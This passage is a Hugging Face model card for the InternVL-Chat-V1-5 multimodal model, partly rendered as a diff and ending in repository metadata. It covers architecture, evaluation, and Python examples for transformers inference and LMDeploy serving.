We introduce three simple designs:
|
| 35 |
+
|
| 36 |
+
1. **Strong Vision Encoder:** we explored a continuous learning strategy for the large-scale vision foundation model---InternViT-6B, boosting its visual understanding capabilities and allowing it to be transferred and reused across different LLMs.
|
| 37 |
+
2. **Dynamic High-Resolution:** we divide images into 1 to 40 tiles of 448 × 448 pixels according to the aspect ratio and resolution of the input images, supporting inputs of up to 4K resolution during inference.
|
| 38 |
+
3. **High-Quality Bilingual Dataset:** we carefully collected a high-quality bilingual dataset covering common scenes and document images, annotated with English and Chinese question-answer pairs, significantly enhancing performance on OCR- and Chinese-related tasks.
|
| 39 |
+
|
| 40 |
+
## Model Details
|
| 41 |
+
|
| 42 |
+
- **Model Type:** multimodal large language model (MLLM)
|
| 43 |
+
|
| 44 |
+
- **Model Stats:**
|
| 45 |
+
|
| 46 |
+
- Architecture: [InternViT-6B-448px-V1-5](https://huggingface.co/OpenGVLab/InternViT-6B-448px-V1-5) + MLP + [InternLM2-Chat-20B](https://huggingface.co/internlm/internlm2-chat-20b)
|
| 47 |
+
- Image size: dynamic resolution, up to 40 tiles of 448 × 448 (4K resolution).
|
| 48 |
+
- Params: 25.5B
|
| 49 |
+
|
| 50 |
+
- **Training Strategy:**
|
| 51 |
+
|
| 52 |
+
- Learnable component in the pre-training stage: ViT + MLP
|
| 53 |
+
- Learnable component in the fine-tuning stage: ViT + MLP + LLM
|
| 54 |
+
- For more details on training hyperparameters, please see our [blog](https://internvl.github.io/blog/2024-04-30-InternVL-1.5/).
|
| 55 |
+
|
| 56 |
+
## Architecture
|
| 57 |
+
|
| 58 |
+

|
| 59 |
+
|
| 60 |
+
## Performance
|
| 61 |
+
|
| 62 |
+

|
| 63 |
+
|
| 64 |
+

|
| 65 |
+
|
| 66 |
+
- We simultaneously use [InternVL](https://github.com/OpenGVLab/InternVL) and [VLMEvalKit](https://github.com/open-compass/VLMEvalKit) repositories for model evaluation. Specifically, the results reported for DocVQA, ChartQA, InfoVQA, TextVQA, MME, AI2D, MMBench, CCBench, MMVet, and SEED-Image were tested using the InternVL repository. OCRBench, RealWorldQA, HallBench, and MathVista were evaluated using the VLMEvalKit.
|
| 67 |
+
|
| 68 |
+
Limitations: Although we have made efforts to ensure the safety of the model during the training process and to encourage the model to generate text that complies with ethical and legal requirements, the model may still produce unexpected outputs due to its size and probabilistic generation paradigm. For example, the generated responses may contain biases, discrimination, or other harmful content. Please do not propagate such content. We are not responsible for any consequences resulting from the dissemination of harmful information.
|
| 69 |
+
|
| 70 |
+
## Examples
|
| 71 |
+
|
| 72 |
+

|
| 73 |
+

|
| 74 |
+

|
| 75 |
+

|
| 76 |
+

|
| 77 |
+

|
| 78 |
+
|
| 79 |
+
## Quick Start
|
| 80 |
+
|
| 81 |
+
We provide example code to run InternVL-Chat-V1-5 using `transformers`.
|
| 82 |
+
|
| 83 |
+
> Please use `transformers>=4.37.2` to ensure the model works normally.
|
| 84 |
+
|
| 85 |
+
### Model Loading
|
| 86 |
+
|
| 87 |
+
#### 16-bit (bf16 / fp16)
|
| 88 |
+
|
| 89 |
+
```python
|
| 90 |
+
import torch
|
| 91 |
+
from transformers import AutoTokenizer, AutoModel
|
| 92 |
+
path = ""OpenGVLab/InternVL-Chat-V1-5""
|
| 93 |
+
model = AutoModel.from_pretrained(
|
| 94 |
+
path,
|
| 95 |
+
torch_dtype=torch.bfloat16,
|
| 96 |
+
low_cpu_mem_usage=True,
|
| 97 |
+
use_flash_attn=True,
|
| 98 |
+
trust_remote_code=True).eval().cuda()
|
| 99 |
+
```
|
| 100 |
+
|
| 101 |
+
#### BNB 8-bit Quantization
|
| 102 |
+
|
| 103 |
+
```python
|
| 104 |
+
import torch
|
| 105 |
+
from transformers import AutoTokenizer, AutoModel
|
| 106 |
+
path = ""OpenGVLab/InternVL-Chat-V1-5""
|
| 107 |
+
model = AutoModel.from_pretrained(
|
| 108 |
+
path,
|
| 109 |
+
torch_dtype=torch.bfloat16,
|
| 110 |
+
load_in_8bit=True,
|
| 111 |
+
low_cpu_mem_usage=True,
|
| 112 |
+
use_flash_attn=True,
|
| 113 |
+
trust_remote_code=True).eval()
|
| 114 |
+
```
|
| 115 |
+
|
| 116 |
+
#### BNB 4-bit Quantization
|
| 117 |
+
|
| 118 |
+
> **⚠️ Warning:** Due to significant quantization errors with BNB 4-bit quantization on InternViT-6B, the model may produce nonsensical outputs and fail to understand images. Therefore, please avoid using BNB 4-bit quantization.
|
| 119 |
+
|
| 120 |
+
#### Multiple GPUs
|
| 121 |
+
|
| 122 |
+
The reason for writing the code this way is to avoid errors that occur during multi-GPU inference due to tensors not being on the same device. By ensuring that the first and last layers of the large language model (LLM) are on the same device, we prevent such errors.
|
| 123 |
+
|
| 124 |
+
```python
|
| 125 |
+
import math
|
| 126 |
+
import torch
|
| 127 |
+
from transformers import AutoTokenizer, AutoModel
|
| 128 |
+
|
| 129 |
+
def split_model(model_name):
|
| 130 |
+
device_map = {}
|
| 131 |
+
world_size = torch.cuda.device_count()
|
| 132 |
+
num_layers = {'Mini-InternVL-2B-V1-5': 24, 'Mini-InternVL-4B-V1-5': 32, 'InternVL-Chat-V1-5': 48}[model_name]
|
| 133 |
+
# Since the first GPU will be used for ViT, treat it as half a GPU.
|
| 134 |
+
num_layers_per_gpu = math.ceil(num_layers / (world_size - 0.5))
|
| 135 |
+
num_layers_per_gpu = [num_layers_per_gpu] * world_size
|
| 136 |
+
num_layers_per_gpu[0] = math.ceil(num_layers_per_gpu[0] * 0.5)
|
| 137 |
+
layer_cnt = 0
|
| 138 |
+
for i, num_layer in enumerate(num_layers_per_gpu):
|
| 139 |
+
for j in range(num_layer):
|
| 140 |
+
device_map[f'language_model.model.layers.{layer_cnt}'] = i
|
| 141 |
+
layer_cnt += 1
|
| 142 |
+
device_map['vision_model'] = 0
|
| 143 |
+
device_map['mlp1'] = 0
|
| 144 |
+
device_map['language_model.model.tok_embeddings'] = 0
|
| 145 |
+
device_map['language_model.model.embed_tokens'] = 0
|
| 146 |
+
device_map['language_model.output'] = 0
|
| 147 |
+
device_map['language_model.model.norm'] = 0
|
| 148 |
+
device_map['language_model.model.rotary_emb'] = 0
|
| 149 |
+
device_map['language_model.lm_head'] = 0
|
| 150 |
+
device_map[f'language_model.model.layers.{num_layers - 1}'] = 0
|
| 151 |
+
|
| 152 |
+
return device_map
|
| 153 |
+
|
| 154 |
+
path = ""OpenGVLab/InternVL-Chat-V1-5""
|
| 155 |
+
device_map = split_model('InternVL-Chat-V1-5')
|
| 156 |
+
model = AutoModel.from_pretrained(
|
| 157 |
+
path,
|
| 158 |
+
torch_dtype=torch.bfloat16,
|
| 159 |
+
low_cpu_mem_usage=True,
|
| 160 |
+
use_flash_attn=True,
|
| 161 |
+
trust_remote_code=True,
|
| 162 |
+
device_map=device_map).eval()
|
| 163 |
+
```
|
| 164 |
+
|
| 165 |
+
### Inference with Transformers
|
| 166 |
+
|
| 167 |
+
```python
|
| 168 |
+
import numpy as np
|
| 169 |
+
import torch
|
| 170 |
+
import torchvision.transforms as T
|
| 171 |
+
from decord import VideoReader, cpu
|
| 172 |
+
from PIL import Image
|
| 173 |
+
from torchvision.transforms.functional import InterpolationMode
|
| 174 |
+
from transformers import AutoModel, AutoTokenizer
|
| 175 |
+
|
| 176 |
+
IMAGENET_MEAN = (0.485, 0.456, 0.406)
|
| 177 |
+
IMAGENET_STD = (0.229, 0.224, 0.225)
|
| 178 |
+
|
| 179 |
+
def build_transform(input_size):
|
| 180 |
+
MEAN, STD = IMAGENET_MEAN, IMAGENET_STD
|
| 181 |
+
transform = T.Compose([
|
| 182 |
+
T.Lambda(lambda img: img.convert('RGB') if img.mode != 'RGB' else img),
|
| 183 |
+
T.Resize((input_size, input_size), interpolation=InterpolationMode.BICUBIC),
|
| 184 |
+
T.ToTensor(),
|
| 185 |
+
T.Normalize(mean=MEAN, std=STD)
|
| 186 |
+
])
|
| 187 |
+
return transform
|
| 188 |
+
|
| 189 |
+
def find_closest_aspect_ratio(aspect_ratio, target_ratios, width, height, image_size):
|
| 190 |
+
best_ratio_diff = float('inf')
|
| 191 |
+
best_ratio = (1, 1)
|
| 192 |
+
area = width * height
|
| 193 |
+
for ratio in target_ratios:
|
| 194 |
+
target_aspect_ratio = ratio[0] / ratio[1]
|
| 195 |
+
ratio_diff = abs(aspect_ratio - target_aspect_ratio)
|
| 196 |
+
if ratio_diff < best_ratio_diff:
|
| 197 |
+
best_ratio_diff = ratio_diff
|
| 198 |
+
best_ratio = ratio
|
| 199 |
+
elif ratio_diff == best_ratio_diff:
|
| 200 |
+
if area > 0.5 * image_size * image_size * ratio[0] * ratio[1]:
|
| 201 |
+
best_ratio = ratio
|
| 202 |
+
return best_ratio
|
| 203 |
+
|
| 204 |
+
def dynamic_preprocess(image, min_num=1, max_num=12, image_size=448, use_thumbnail=False):
|
| 205 |
+
orig_width, orig_height = image.size
|
| 206 |
+
aspect_ratio = orig_width / orig_height
|
| 207 |
+
|
| 208 |
+
# calculate the existing image aspect ratio
|
| 209 |
+
target_ratios = set(
|
| 210 |
+
(i, j) for n in range(min_num, max_num + 1) for i in range(1, n + 1) for j in range(1, n + 1) if
|
| 211 |
+
i * j <= max_num and i * j >= min_num)
|
| 212 |
+
target_ratios = sorted(target_ratios, key=lambda x: x[0] * x[1])
|
| 213 |
+
|
| 214 |
+
# find the closest aspect ratio to the target
|
| 215 |
+
target_aspect_ratio = find_closest_aspect_ratio(
|
| 216 |
+
aspect_ratio, target_ratios, orig_width, orig_height, image_size)
|
| 217 |
+
|
| 218 |
+
# calculate the target width and height
|
| 219 |
+
target_width = image_size * target_aspect_ratio[0]
|
| 220 |
+
target_height = image_size * target_aspect_ratio[1]
|
| 221 |
+
blocks = target_aspect_ratio[0] * target_aspect_ratio[1]
|
| 222 |
+
|
| 223 |
+
# resize the image
|
| 224 |
+
resized_img = image.resize((target_width, target_height))
|
| 225 |
+
processed_images = []
|
| 226 |
+
for i in range(blocks):
|
| 227 |
+
box = (
|
| 228 |
+
(i % (target_width // image_size)) * image_size,
|
| 229 |
+
(i // (target_width // image_size)) * image_size,
|
| 230 |
+
((i % (target_width // image_size)) + 1) * image_size,
|
| 231 |
+
((i // (target_width // image_size)) + 1) * image_size
|
| 232 |
+
)
|
| 233 |
+
# split the image
|
| 234 |
+
split_img = resized_img.crop(box)
|
| 235 |
+
processed_images.append(split_img)
|
| 236 |
+
assert len(processed_images) == blocks
|
| 237 |
+
if use_thumbnail and len(processed_images) != 1:
|
| 238 |
+
thumbnail_img = image.resize((image_size, image_size))
|
| 239 |
+
processed_images.append(thumbnail_img)
|
| 240 |
+
return processed_images
|
| 241 |
+
|
| 242 |
+
def load_image(image_file, input_size=448, max_num=12):
|
| 243 |
+
image = Image.open(image_file).convert('RGB')
|
| 244 |
+
transform = build_transform(input_size=input_size)
|
| 245 |
+
images = dynamic_preprocess(image, image_size=input_size, use_thumbnail=True, max_num=max_num)
|
| 246 |
+
pixel_values = [transform(image) for image in images]
|
| 247 |
+
pixel_values = torch.stack(pixel_values)
|
| 248 |
+
return pixel_values
|
| 249 |
+
|
| 250 |
+
# If you have an 80G A100 GPU, you can put the entire model on a single GPU.
|
| 251 |
+
# Otherwise, you need to load a model using multiple GPUs, please refer to the `Multiple GPUs` section.
|
| 252 |
+
path = 'OpenGVLab/InternVL-Chat-V1-5'
|
| 253 |
+
model = AutoModel.from_pretrained(
|
| 254 |
+
path,
|
| 255 |
+
torch_dtype=torch.bfloat16,
|
| 256 |
+
low_cpu_mem_usage=True,
|
| 257 |
+
use_flash_attn=True,
|
| 258 |
+
trust_remote_code=True).eval().cuda()
|
| 259 |
+
tokenizer = AutoTokenizer.from_pretrained(path, trust_remote_code=True, use_fast=False)
|
| 260 |
+
|
| 261 |
+
# set the max number of tiles in `max_num`
|
| 262 |
+
pixel_values = load_image('./examples/image1.jpg', max_num=12).to(torch.bfloat16).cuda()
|
| 263 |
+
generation_config = dict(max_new_tokens=1024, do_sample=True)
|
| 264 |
+
|
| 265 |
+
# pure-text conversation (纯文本对话)
|
| 266 |
+
question = 'Hello, who are you?'
|
| 267 |
+
response, history = model.chat(tokenizer, None, question, generation_config, history=None, return_history=True)
|
| 268 |
+
print(f'User: {question}\nAssistant: {response}')
|
| 269 |
+
|
| 270 |
+
question = 'Can you tell me a story?'
|
| 271 |
+
response, history = model.chat(tokenizer, None, question, generation_config, history=history, return_history=True)
|
| 272 |
+
print(f'User: {question}\nAssistant: {response}')
|
| 273 |
+
|
| 274 |
+
# single-image single-round conversation (单图单轮对话)
|
| 275 |
+
question = '<image>\nPlease describe the image shortly.'
|
| 276 |
+
response = model.chat(tokenizer, pixel_values, question, generation_config)
|
| 277 |
+
print(f'User: {question}\nAssistant: {response}')
|
| 278 |
+
|
| 279 |
+
# single-image multi-round conversation (单图多轮对话)
|
| 280 |
+
question = '<image>\nPlease describe the image in detail.'
|
| 281 |
+
response, history = model.chat(tokenizer, pixel_values, question, generation_config, history=None, return_history=True)
|
| 282 |
+
print(f'User: {question}\nAssistant: {response}')
|
| 283 |
+
|
| 284 |
+
question = 'Please write a poem according to the image.'
|
| 285 |
+
response, history = model.chat(tokenizer, pixel_values, question, generation_config, history=history, return_history=True)
|
| 286 |
+
print(f'User: {question}\nAssistant: {response}')
|
| 287 |
+
|
| 288 |
+
# multi-image multi-round conversation, combined images (多图多轮对话,拼接图像)
|
| 289 |
+
pixel_values1 = load_image('./examples/image1.jpg', max_num=12).to(torch.bfloat16).cuda()
|
| 290 |
+
pixel_values2 = load_image('./examples/image2.jpg', max_num=12).to(torch.bfloat16).cuda()
|
| 291 |
+
pixel_values = torch.cat((pixel_values1, pixel_values2), dim=0)
|
| 292 |
+
|
| 293 |
+
question = '<image>\nDescribe the two images in detail.'
|
| 294 |
+
response, history = model.chat(tokenizer, pixel_values, question, generation_config,
|
| 295 |
+
history=None, return_history=True)
|
| 296 |
+
print(f'User: {question}\nAssistant: {response}')
|
| 297 |
+
|
| 298 |
+
question = 'What are the similarities and differences between these two images.'
|
| 299 |
+
response, history = model.chat(tokenizer, pixel_values, question, generation_config,
|
| 300 |
+
history=history, return_history=True)
|
| 301 |
+
print(f'User: {question}\nAssistant: {response}')
|
| 302 |
+
|
| 303 |
+
# multi-image multi-round conversation, separate images (多图多轮对话,独立图像)
|
| 304 |
+
pixel_values1 = load_image('./examples/image1.jpg', max_num=12).to(torch.bfloat16).cuda()
|
| 305 |
+
pixel_values2 = load_image('./examples/image2.jpg', max_num=12).to(torch.bfloat16).cuda()
|
| 306 |
+
pixel_values = torch.cat((pixel_values1, pixel_values2), dim=0)
|
| 307 |
+
num_patches_list = [pixel_values1.size(0), pixel_values2.size(0)]
|
| 308 |
+
|
| 309 |
+
question = 'Image-1: <image>\nImage-2: <image>\nDescribe the two images in detail.'
|
| 310 |
+
response, history = model.chat(tokenizer, pixel_values, question, generation_config,
|
| 311 |
+
num_patches_list=num_patches_list,
|
| 312 |
+
                               history=None, return_history=True)
print(f'User: {question}\nAssistant: {response}')

question = 'What are the similarities and differences between these two images.'
response, history = model.chat(tokenizer, pixel_values, question, generation_config,
                               num_patches_list=num_patches_list,
                               history=history, return_history=True)
print(f'User: {question}\nAssistant: {response}')

# batch inference, single image per sample (单图批处理)
pixel_values1 = load_image('./examples/image1.jpg', max_num=12).to(torch.bfloat16).cuda()
pixel_values2 = load_image('./examples/image2.jpg', max_num=12).to(torch.bfloat16).cuda()
num_patches_list = [pixel_values1.size(0), pixel_values2.size(0)]
pixel_values = torch.cat((pixel_values1, pixel_values2), dim=0)

questions = ['<image>\nDescribe the image in detail.'] * len(num_patches_list)
responses = model.batch_chat(tokenizer, pixel_values,
                             num_patches_list=num_patches_list,
                             questions=questions,
                             generation_config=generation_config)
for question, response in zip(questions, responses):
    print(f'User: {question}\nAssistant: {response}')

# video multi-round conversation (视频多轮对话)
def get_index(bound, fps, max_frame, first_idx=0, num_segments=32):
    if bound:
        start, end = bound[0], bound[1]
    else:
        start, end = -100000, 100000
    start_idx = max(first_idx, round(start * fps))
    end_idx = min(round(end * fps), max_frame)
    seg_size = float(end_idx - start_idx) / num_segments
    frame_indices = np.array([
        int(start_idx + (seg_size / 2) + np.round(seg_size * idx))
        for idx in range(num_segments)
    ])
    return frame_indices

def load_video(video_path, bound=None, input_size=448, max_num=1, num_segments=32):
    vr = VideoReader(video_path, ctx=cpu(0), num_threads=1)
    max_frame = len(vr) - 1
    fps = float(vr.get_avg_fps())

    pixel_values_list, num_patches_list = [], []
    transform = build_transform(input_size=input_size)
    frame_indices = get_index(bound, fps, max_frame, first_idx=0, num_segments=num_segments)
    for frame_index in frame_indices:
        img = Image.fromarray(vr[frame_index].asnumpy()).convert('RGB')
        img = dynamic_preprocess(img, image_size=input_size, use_thumbnail=True, max_num=max_num)
        pixel_values = [transform(tile) for tile in img]
        pixel_values = torch.stack(pixel_values)
        num_patches_list.append(pixel_values.shape[0])
        pixel_values_list.append(pixel_values)
    pixel_values = torch.cat(pixel_values_list)
    return pixel_values, num_patches_list

video_path = './examples/red-panda.mp4'
pixel_values, num_patches_list = load_video(video_path, num_segments=8, max_num=1)
pixel_values = pixel_values.to(torch.bfloat16).cuda()
video_prefix = ''.join([f'Frame{i+1}: <image>\n' for i in range(len(num_patches_list))])
question = video_prefix + 'What is the red panda doing?'
# Frame1: <image>\nFrame2: <image>\n...\nFrame8: <image>\n{question}
response, history = model.chat(tokenizer, pixel_values, question, generation_config,
                               num_patches_list=num_patches_list, history=None, return_history=True)
print(f'User: {question}\nAssistant: {response}')

question = 'Describe this video in detail.'
response, history = model.chat(tokenizer, pixel_values, question, generation_config,
                               num_patches_list=num_patches_list, history=history, return_history=True)
print(f'User: {question}\nAssistant: {response}')
```
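
For intuition, `get_index` above picks one frame near the center of each of `num_segments` equal slices of the clip. A quick standalone check with hypothetical numbers (a 10-second clip at 24 fps; not part of the original example):

```python
import numpy as np

# Hypothetical clip: 10 s at 24 fps -> frames 0..239, sampled as 8 segments
fps, max_frame, num_segments = 24.0, 239, 8
seg_size = max_frame / num_segments  # 29.875 frames per slice
indices = np.array([int(seg_size / 2 + np.round(seg_size * i)) for i in range(num_segments)])
print(indices)  # [ 14  44  74 104 134 163 193 223], one frame near the center of each slice
```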

#### Streaming Output

Besides the method above, you can also use the following code to get streaming output.

```python
from transformers import TextIteratorStreamer
from threading import Thread

# Initialize the streamer
streamer = TextIteratorStreamer(tokenizer, skip_prompt=True, skip_special_tokens=True, timeout=10)
# Define the generation configuration
generation_config = dict(max_new_tokens=1024, do_sample=False, streamer=streamer)
# Start the model chat in a separate thread
thread = Thread(target=model.chat, kwargs=dict(
    tokenizer=tokenizer, pixel_values=pixel_values, question=question,
    history=None, return_history=False, generation_config=generation_config,
))
thread.start()

# Initialize an empty string to store the generated text
generated_text = ''
# Loop through the streamer to get the new text as it is generated
for new_text in streamer:
    if new_text == model.conv_template.sep:
        break
    generated_text += new_text
    print(new_text, end='', flush=True)  # Print each new chunk of generated text on the same line
```

## Finetune

Many repositories now support fine-tuning of the InternVL series models, including [InternVL](https://github.com/OpenGVLab/InternVL), [SWIFT](https://github.com/modelscope/ms-swift), [XTuner](https://github.com/InternLM/xtuner), and others. Please refer to their documentation for more details on fine-tuning.

## Deployment

### LMDeploy

LMDeploy is a toolkit for compressing, deploying, and serving LLMs & VLMs.

```sh
pip install "lmdeploy>=0.5.3"
```

LMDeploy abstracts the complex inference process of multi-modal Vision-Language Models (VLMs) into an easy-to-use pipeline, similar to the Large Language Model (LLM) inference pipeline.

#### A 'Hello, world' Example

```python
from lmdeploy import pipeline, TurbomindEngineConfig
from lmdeploy.vl import load_image

model = 'OpenGVLab/InternVL-Chat-V1-5'
image = load_image('https://raw.githubusercontent.com/open-mmlab/mmdeploy/main/tests/data/tiger.jpeg')
pipe = pipeline(model, backend_config=TurbomindEngineConfig(session_len=8192))
response = pipe(('describe this image', image))
print(response.text)
```

If an `ImportError` occurs while running this example, please install the required dependency packages as prompted.

#### Multi-image Inference

When dealing with multiple images, you can put them all in one list. Keep in mind that multiple images will lead to a higher number of input tokens, and as a result, the size of the context window typically needs to be increased.

> Warning: Due to the scarcity of multi-image conversation data, the performance on multi-image tasks may be unstable, and it may require multiple attempts to achieve satisfactory results.

```python
from lmdeploy import pipeline, TurbomindEngineConfig
from lmdeploy.vl import load_image
from lmdeploy.vl.constants import IMAGE_TOKEN

model = 'OpenGVLab/InternVL-Chat-V1-5'
pipe = pipeline(model, backend_config=TurbomindEngineConfig(session_len=8192))

image_urls = [
    'https://raw.githubusercontent.com/open-mmlab/mmdeploy/main/demo/resources/human-pose.jpg',
    'https://raw.githubusercontent.com/open-mmlab/mmdeploy/main/demo/resources/det.jpg'
]

images = [load_image(img_url) for img_url in image_urls]
# Numbering images improves multi-image conversations
response = pipe((f'Image-1: {IMAGE_TOKEN}\nImage-2: {IMAGE_TOKEN}\ndescribe these two images', images))
print(response.text)
```
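
If you pass more images than the default context can hold, enlarge the engine's context window. A minimal sketch, assuming the same `TurbomindEngineConfig` as above (16384 is an arbitrary illustrative value):

```python
from lmdeploy import pipeline, TurbomindEngineConfig

# A larger session_len leaves room for the extra image tokens;
# the right value depends on how many images you batch per request.
pipe = pipeline('OpenGVLab/InternVL-Chat-V1-5',
                backend_config=TurbomindEngineConfig(session_len=16384))
```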

#### Batch Prompts Inference

Conducting inference with batch prompts is quite straightforward; just place them within a list structure:

```python
from lmdeploy import pipeline, TurbomindEngineConfig
from lmdeploy.vl import load_image

model = 'OpenGVLab/InternVL-Chat-V1-5'
pipe = pipeline(model, backend_config=TurbomindEngineConfig(session_len=8192))

image_urls = [
    "https://raw.githubusercontent.com/open-mmlab/mmdeploy/main/demo/resources/human-pose.jpg",
    "https://raw.githubusercontent.com/open-mmlab/mmdeploy/main/demo/resources/det.jpg"
]
prompts = [('describe this image', load_image(img_url)) for img_url in image_urls]
response = pipe(prompts)
print(response)
```
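
With batch prompts, `pipe` returns one response per prompt. A small sketch of unpacking them, assuming each element exposes the same `.text` attribute as in the single-prompt examples above:

```python
# prompts and response come from the batch example above
for (prompt_text, _), resp in zip(prompts, response):
    print(f'{prompt_text} -> {resp.text}')
```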

#### Multi-turn Conversation

There are two ways to run multi-turn conversations with the pipeline. One is to construct messages according to the OpenAI format and use the method introduced above (a sketch of this follows the example below); the other is to use the `pipeline.chat` interface.

```python
from lmdeploy import pipeline, TurbomindEngineConfig, GenerationConfig
from lmdeploy.vl import load_image

model = 'OpenGVLab/InternVL-Chat-V1-5'
pipe = pipeline(model, backend_config=TurbomindEngineConfig(session_len=8192))

image = load_image('https://raw.githubusercontent.com/open-mmlab/mmdeploy/main/demo/resources/human-pose.jpg')
gen_config = GenerationConfig(top_k=40, top_p=0.8, temperature=0.8)
sess = pipe.chat(('describe this image', image), gen_config=gen_config)
print(sess.response.text)
sess = pipe.chat('What is the woman doing?', session=sess, gen_config=gen_config)
print(sess.response.text)
```
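
For the first approach, you keep the history yourself: build an OpenAI-style message list, append each assistant reply, and feed the whole list back in. A minimal sketch, assuming the pipeline accepts GPT-4V-style message lists (the layout mirrors the API payload in the Service section below):

```python
from lmdeploy import pipeline, TurbomindEngineConfig

pipe = pipeline('OpenGVLab/InternVL-Chat-V1-5',
                backend_config=TurbomindEngineConfig(session_len=8192))

messages = [{
    'role': 'user',
    'content': [
        {'type': 'text', 'text': 'describe this image'},
        {'type': 'image_url', 'image_url': {
            'url': 'https://raw.githubusercontent.com/open-mmlab/mmdeploy/main/demo/resources/human-pose.jpg'}},
    ],
}]
out = pipe(messages)
# Carry the answer forward as history for the next turn
messages.append({'role': 'assistant', 'content': out.text})
messages.append({'role': 'user', 'content': 'What is the woman doing?'})
out = pipe(messages)
print(out.text)
```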

#### Service

LMDeploy's `api_server` enables models to be easily packed into services with a single command. The provided RESTful APIs are compatible with OpenAI's interfaces. Below is an example of service startup:

```shell
lmdeploy serve api_server OpenGVLab/InternVL-Chat-V1-5 --server-port 23333
```

To use the OpenAI-style interface, you need to install the OpenAI Python package:

```shell
pip install openai
```

Then, use the code below to make the API call:

```python
from openai import OpenAI

client = OpenAI(api_key='YOUR_API_KEY', base_url='http://0.0.0.0:23333/v1')
model_name = client.models.list().data[0].id
response = client.chat.completions.create(
    model=model_name,
    messages=[{
        'role': 'user',
        'content': [{
            'type': 'text',
            'text': 'describe this image',
        }, {
            'type': 'image_url',
            'image_url': {
                'url': 'https://modelscope.oss-cn-beijing.aliyuncs.com/resource/tiger.jpeg',
            },
        }],
    }],
    temperature=0.8,
    top_p=0.8)
print(response)
```
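
Because the server speaks the OpenAI protocol, streaming works through the same client. A short sketch, assuming the standard `stream=True` behavior of OpenAI-compatible endpoints (reusing `client` and `model_name` from the example above):

```python
stream = client.chat.completions.create(
    model=model_name,
    messages=[{'role': 'user', 'content': 'describe a tiger in one sentence'}],
    temperature=0.8,
    stream=True)
for chunk in stream:
    delta = chunk.choices[0].delta.content
    if delta:  # the final chunk may carry no content
        print(delta, end='', flush=True)
```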

## License

This project is released under the MIT License. This project uses the pre-trained internlm2-chat-20b as a component, which is licensed under the Apache License 2.0.

## Citation

If you find this project useful in your research, please consider citing:

```BibTeX
@article{chen2024expanding,
  title={Expanding Performance Boundaries of Open-Source Multimodal Models with Model, Data, and Test-Time Scaling},
  author={Chen, Zhe and Wang, Weiyun and Cao, Yue and Liu, Yangzhou and Gao, Zhangwei and Cui, Erfei and Zhu, Jinguo and Ye, Shenglong and Tian, Hao and Liu, Zhaoyang and others},
  journal={arXiv preprint arXiv:2412.05271},
  year={2024}
}
@article{gao2024mini,
  title={Mini-InternVL: A flexible-transfer pocket multimodal model with 5\% parameters and 90\% performance},
  author={Gao, Zhangwei and Chen, Zhe and Cui, Erfei and Ren, Yiming and Wang, Weiyun and Zhu, Jinguo and Tian, Hao and Ye, Shenglong and He, Junjun and Zhu, Xizhou and others},
  journal={arXiv preprint arXiv:2410.16261},
  year={2024}
}
@article{chen2024far,
  title={How Far Are We to GPT-4V? Closing the Gap to Commercial Multimodal Models with Open-Source Suites},
  author={Chen, Zhe and Wang, Weiyun and Tian, Hao and Ye, Shenglong and Gao, Zhangwei and Cui, Erfei and Tong, Wenwen and Hu, Kongzhi and Luo, Jiapeng and Ma, Zheng and others},
  journal={arXiv preprint arXiv:2404.16821},
  year={2024}
}
@inproceedings{chen2024internvl,
  title={InternVL: Scaling up vision foundation models and aligning for generic visual-linguistic tasks},
  author={Chen, Zhe and Wu, Jiannan and Wang, Wenhai and Su, Weijie and Chen, Guo and Xing, Sen and Zhong, Muyan and Zhang, Qinglong and Zhu, Xizhou and Lu, Lewei and others},
  booktitle={Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition},
  pages={24185--24198},
  year={2024}
}
```
","{""id"": ""OpenGVLab/InternVL-Chat-V1-5"", ""author"": ""OpenGVLab"", ""sha"": ""5fde09e092da1be5a86ffdae196913570f81c5ad"", ""last_modified"": ""2025-03-25 05:44:05+00:00"", ""created_at"": ""2024-04-18 08:07:48+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 2671, ""downloads_all_time"": null, ""likes"": 413, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""tensorboard"", ""safetensors"", ""internvl_chat"", ""feature-extraction"", ""internvl"", ""custom_code"", ""image-text-to-text"", ""conversational"", ""multilingual"", ""arxiv:2312.14238"", ""arxiv:2404.16821"", ""arxiv:2410.16261"", ""arxiv:2412.05271"", ""base_model:OpenGVLab/InternViT-6B-448px-V1-5"", ""base_model:merge:OpenGVLab/InternViT-6B-448px-V1-5"", ""base_model:internlm/internlm2-chat-20b"", ""base_model:merge:internlm/internlm2-chat-20b"", ""license:mit"", ""region:us""], ""pipeline_tag"": ""image-text-to-text"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model:\n- OpenGVLab/InternViT-6B-448px-V1-5\n- internlm/internlm2-chat-20b\nlanguage:\n- multilingual\nlibrary_name: transformers\nlicense: mit\npipeline_tag: image-text-to-text\ntags:\n- internvl\n- custom_code\nnew_version: OpenGVLab/InternVL2_5-26B\nbase_model_relation: merge"", ""widget_data"": null, ""model_index"": null, ""config"": {""architectures"": [""InternVLChatModel""], ""auto_map"": {""AutoConfig"": ""configuration_internvl_chat.InternVLChatConfig"", ""AutoModel"": ""modeling_internvl_chat.InternVLChatModel"", ""AutoModelForCausalLM"": ""modeling_internvl_chat.InternVLChatModel""}, ""model_type"": ""internvl_chat"", ""tokenizer_config"": {""bos_token"": ""<s>"", ""chat_template"": ""{{ bos_token }}{% for message in messages %}{{'<|im_start|>' + message['role'] + '\n' + message['content'] + '<|im_end|>' + '\n'}}{% endfor %}{% if add_generation_prompt %}{{ '<|im_start|>assistant\n' }}{% endif %}"", ""eos_token"": ""</s>"", ""pad_token"": ""</s>"", ""unk_token"": ""<unk>""}}, ""transformers_info"": {""auto_model"": ""AutoModel"", ""custom_class"": ""modeling_internvl_chat.InternVLChatModel"", ""pipeline_tag"": ""feature-extraction"", ""processor"": null}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='added_tokens.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='configuration_intern_vit.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='configuration_internlm2.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='configuration_internvl_chat.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='conversation.py', size=None, blob_id=None, lfs=None)"", 